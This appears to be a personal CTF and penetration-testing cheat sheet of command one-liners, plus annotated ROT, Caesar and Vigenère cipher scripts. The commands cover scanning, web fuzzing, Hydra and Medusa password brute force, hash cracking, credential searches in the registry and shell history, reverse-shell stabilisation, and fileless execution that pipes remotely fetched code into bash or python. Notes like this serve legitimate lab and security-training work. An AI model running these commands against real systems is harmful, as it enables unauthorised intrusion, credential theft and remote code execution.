Image taken from CTF-CheatSheet.
Wikis
HackTricks
PentestBook
SQLMap
Fuff
portScanning
hailmaryScan
1
| sudo incursore.sh --type All -H $IP
|
tcpSynCommonPorts
1
| sudo nmap -sS -A -Pn --min-rate 10000 $IP
|
tcpSynAllPorts
1
| sudo nmap -sS -A -Pn --min-rate 10000 -p- $IP
|
vulnerabilityScanning
startNessusWSL2
1
| sudo /opt/nessus/sbin/nessus-service
|
webServerEnum
ZAP
Burp Suite
Postman
WAF
1
| nmap -Pn -p 443 --script http-waf-detect,http-waf-fingerprint $IP
|
tech
robots
1
| curl https://$IP/robots
|
1
| curl https://$IP/robots.txt
|
bannerGrabbing
fileExtensionSearch
1
| ffuf -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://$IP/$dir/indexFUZZ -c -ac -ic
|
dirBustingAndFileSearch
1
| ffuf -u http://$domain/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -recursion -recursion-depth 1 -e .aspx,.html,.php,.txt,.jsp -c -ac -ic -v
|
1
| gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .aspx,.html,.php,.txt,.jsp
|
1
| dirsearch -u http://$IP
|
subdomainBusting
1
| gobuster dns -d $domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
|
1
| ffuf -u http://FUZZ.$domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -ac -c -ic
|
subdomainBustingWithLocalDnsAsResolver
1
| gobuster dns -d $domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r $IP:53
|
vhostBusting
1
| ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://$domain -H "HOST: FUZZ.$domain" -ac -c -ic
|
1
| gobuster vhost -u $URL -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt --append-domain
|
parameterFuzzing
getRequests
1
| ffuf -u http://internal.analysis.htb/users/list.php?FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -ic
|
1
| ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://$domain/$file.php?FUZZ=key -fs xxx
|
postRequests
1
| ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://$domain/$file -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
|
phpFiles
1
| ffuf -w $wordlist -u http://$url/$file -X POST -d '$param=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx
|
Dictionary Attack - Basic HTTP Authentication
1
| hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $ip -s $port http-get / -f -u
|
1
| hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP -s $PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" -f -u
|
kernelVersion
fileEnumLinux
SUIDS
1
| find / -perm -4000 2>/dev/null
|
1
| find / -perm -u=s 2>/dev/null
|
configFiles
1
| /var/www/html$ find . | grep config
|
dbStringsWithinConfigFiles
1
| /var/www/html$ grep database <filePath>
|
fileEnumWindows
RegistryFilesPasswordString
1
| reg query HKLM /f password /t REG_SZ /s
|
1
| reg query HKCU /f password /t REG_SZ /s
|
powershellHistory
1
| type C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
FTP
bounceAttack
1
| nmap -Pn -v -n -p80 -b <username>:<pass>@<IP> <target2scan>
|
bruteForce
1
| medusa -u <username> -P <passList> -h <IP> -M ftp
|
1
| hydra -l <username> -P <passList> ftp://<IP> -t 48
|
SSH
sshAudit
1
| python3 /opt/ssh-audit/ssh-audit.py $IP
|
bruteForce
1
| hydra -L <userList> -P <passwordList> ssh://$IP
|
hashCracking
Hashcat-examples
autodetectMode
1
| hashcat <hashes> /usr/share/wordlists/rockyou.txt --username
|
bruteForce
1
| hashcat -m 3200 hashes /usr/share/wordlists/rockyou.txt --username
|
crackedHashes
1
| hashcat -m 3200 --username --show hashes
|
John hash formats
bruteForce
1
| john <hashes> --wordlist=/usr/share/wordlists/rockyou.txt
|
shellStabilization
withScript
1
| script -O /dev/null -q /bin/bash
|
withPython
1
| python3 -c 'import.pty;pty.spawn("/bin/bash")'
|
shellConfig
| ^Z
[1]+ Stopped nc -lvnp 1337
attackHostRowsAndCols
| echo $TERM
stty size # rows and cols
targetRowsAndCols
1
| www-data@50bca5e748b0:/var/www/html$ stty rows 51 cols 209
|
termExport
1
| www-data@50bca5e748b0:/var/www/html$ export TERM=xterm
|
fileTransferLinux
httpDownloadServer
1
| python2.7 -m SimpleHTTPServer
|
1
| ruby -run -ehttpd . -p8000
|
httpUploadServer
1
| python3 -m uploadserver
|
filelessExecution
1
| curl http://$IP/$file | bash
|
1
| wget -qO- https://$IP/pythonScript | python3
|
fileDownload
1
| wget http://$IP/$file -O $file
|
1
| curl http://$IP/$file -o $file
|
remoteServerDownload
1
| curl http://$IP/$file -o $file
|
local2Remote
1
| scp $file user@remoteHost:/tmp/$file
|
remote2Local
1
| scp user@remoteHost:$filePath $filePath2Save
|
httpsTransfer
1
| openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' # create self-sign cert
|
1
| mkdir https && cd https # create and move to webroot (must be different dir from the cert)
|
1
| sudo python3 -m uploadserver 443 --server-certificate /root/server.pem # start webServer using the cert
|
1
| curl -X POST https://$IP/upload -F 'files=@$file' -F 'files=@$file' --insecure # download from target
|
fileTransferWindows
fileDownload
1
| wget https://$IP/$file -O /tmp/$file
|
1
| curl -o /tmp/$file https://$IP/$file
|
1
| Invoke-WebRequest https://$IP/$file -OutFile $file
|
1
| bitsadmin /transfer n http://$IP/$file C:\Temp\$file
|
1
| certutil.exe -verifyctl -split -f http://$IP/$file
|
1
| php -r '$file = file_get_contents("https://$IP/$file"); file_put_contents("$file",$file);'
|
remote2Local
1
| scp user@remoteHost:/tmp/$file C:\Temp\$file
|
local2Remote
1
| scp C:\Temp\$file user@remoteHost:/tmp/$file
|
fileUpload
1
| Invoke-WebRequest -Uri http://$IP -Method POST -Body $b64
|
| locate linpeas
/usr/share/peass/linpeas/linpeas.sh
locate winpeas
/usr/share/peass/winpeas/winPEASany.exe
/usr/share/peass/winpeas/winPEASx64.exe
/usr/share/peass/winpeas/winPEASx86.exe
cryptography
encryption
# ROT13 as a shell alias; the mapping is its own inverse, so the same alias encodes and decodes.
alias rot13='tr A-Za-z N-ZA-Mn-za-m'
# ROT13
# Every letter moves 13 places; the second tr is the inverse map of the first
# (and, because 13+13 = 26, the two commands are in fact interchangeable).
printf '%s\n' '<plaintext>' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
printf '%s\n' '<ciphertext>' | tr 'N-ZA-Mn-za-m' 'A-Za-z'
# ROT13.5 (ROT18) > ROT13 (for letters) and ROT5 (for numbers)
# SET2 lists the letters shifted by 13 followed by the digits as 5-9,0-4,
# so each digit moves 5 places; the second tr reverses both maps.
printf '%s\n' '<plaintext>' | tr 'A-Za-z0-9' 'N-ZA-Mn-za-m5-90-4'
printf '%s\n' '<ciphertext>' | tr 'N-ZA-Mn-za-m5-90-4' 'A-Za-z0-9'
# ROT47
# Rotates the 94 printable ASCII characters '!'..'~' by 47 ('!' -> 'P');
# 94 = 2*47, so applying the map twice restores the input.
printf '%s\n' '<plaintext>' | tr '\!-~' 'P-~\!-O'
printf '%s\n' '<ciphertext>' | tr 'P-~\!-O' '\!-~'
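# ROT script
#!/usr/bin/bash
# Rotate every letter of a phrase by N positions (ROT-N; ROT13 when N is omitted).
# Usage: rot.sh [phrase] [rotation]
#   phrase    text to rotate (default: the '<plaitext>' placeholder, as in the original)
#   rotation  integer shift, any sign; reduced modulo 26 (default: 13)
# Both letter cases are rotated; every other character passes through tr unchanged.
lower=abcdefghijklmnopqrstuvwxyz
upper=ABCDEFGHIJKLMNOPQRSTUVWXYZ
# Doubled alphabets: the 26-character window starting at offset N is the rotated alphabet.
dual=${lower}${lower}
dual_upper=${upper}${upper}

#######################################
# Print $1 with each letter shifted by $2 positions.
# Globals:   lower, upper, dual, dual_upper (read)
# Arguments: $1 - phrase; $2 - rotation (integer, default 13)
# Outputs:   rotated phrase plus newline on stdout
#######################################
rot_shift() {
  local text=$1
  local n=$(( ${2:-13} % 26 ))
  # bash's % takes the sign of the dividend; a negative shift must wrap back into 0..25,
  # otherwise ${dual:n:26} would not be a full 26-letter alphabet and tr would mis-map.
  (( n < 0 )) && n=$(( n + 26 ))
  # printf, not echo: the phrase is data and may start with "-" or contain backslashes;
  # the expansion is quoted so spaces and glob characters in the phrase survive.
  printf '%s\n' "$text" | tr "${lower}${upper}" "${dual:n:26}${dual_upper:n:26}"
}

phrase=${1:-'<plaitext>'}
rotat=${2:-13}
newphrase=$(rot_shift "$phrase" "$rotat")
printf '%s\n' "$newphrase"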
# Caesar cipher
# Fixed shift of 3 backwards on encrypt (a -> x, d -> a) and forwards on decrypt.
# The square brackets are ordinary characters to tr here, not a class, and map to themselves.
printf '%s\n' '<plaintext>' | tr '[a-zA-Z]' '[x-za-wX-ZA-W]'
printf '%s\n' '<ciphertext>' | tr '[x-za-wX-ZA-W]' '[a-zA-Z]'
| # vigenere
/opt/cryptography/vigenere.sh
/opt/cryptography/vigenere.sh -d
# Vigenere script
#!/usr/local/bin/bash
# Vigenère cipher over the uppercase alphabet A-Z; text and key are read interactively.
# Usage: vigenere.sh [-d]    (-d decrypts; any other argument prints usage and exits 1)
a="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# With every "-d" removed from "$*", anything left over is an unexpected argument.
[[ "${*/-d/}" != "" ]] &&
echo "Usage: $0 [-d]" && exit 1
# m is "-" when an argument was given (i.e. -d), empty otherwise; it becomes the operator below.
m=${1:+-}
# NOTE(review): read without -r interprets backslashes in the input.
printf "string: ";read t
printf "keyphrase: ";read -s k
printf "\n"
for ((i=0;i<${#t};i++)); do
# ${a%%X*} strips a from the first X onward, so ${#p1} is the 0-based index of the
# i-th text character in a (26 when the character is not an uppercase letter).
p1=${a%%${t:$i:1}*}
# Same for the key character, cycling through k with i mod ${#k}
# (an empty key makes this a division by zero).
p2=${a%%${k:$((i%${#k})):1}*}
# Add (encrypt) or subtract (decrypt, m="-") the key index modulo 26 and append that letter.
# A negative result selects from the end of a via bash's negative-offset substring rule,
# which still yields the right letter. Characters outside A-Z are not preserved.
d="${d}${a:$(((${#p1}${m:-+}${#p2})%${#a})):1}"
done
echo "$d"
encoding
# Base64 encode / decode. $text is a file path here (base64 reads the named file);
# to encode a string instead, pipe it in: printf '%s' "$string" | base64
# NOTE(review): the expansion is unquoted, so a path with spaces or glob characters is split.
base64 $text
base64 -d $text
# Message digests with openssl. $text is a file path (openssl hashes the named file);
# for a string use: printf '%s' "$string" | openssl sha256
# MD5 and SHA-1 are not collision-resistant: fine for matching a known checksum,
# not for integrity or signing decisions — prefer sha256 there.
# NOTE(review): the expansion is unquoted, so a path with spaces or glob characters is split.
openssl md5 $text
openssl sha1 $text
openssl sha256 $text
# Same digests with coreutils; $text is a file path and the output is "<hex>  <path>".
# md5sum/sha1sum suit quick checksums of known files only; use sha256sum for integrity checks.
# NOTE(review): the expansion is unquoted, so a path with spaces or glob characters is split.
md5sum $text
sha1sum $text
sha256sum $text
SQLMap
1
| sqlmap -u "$URL" --batch
|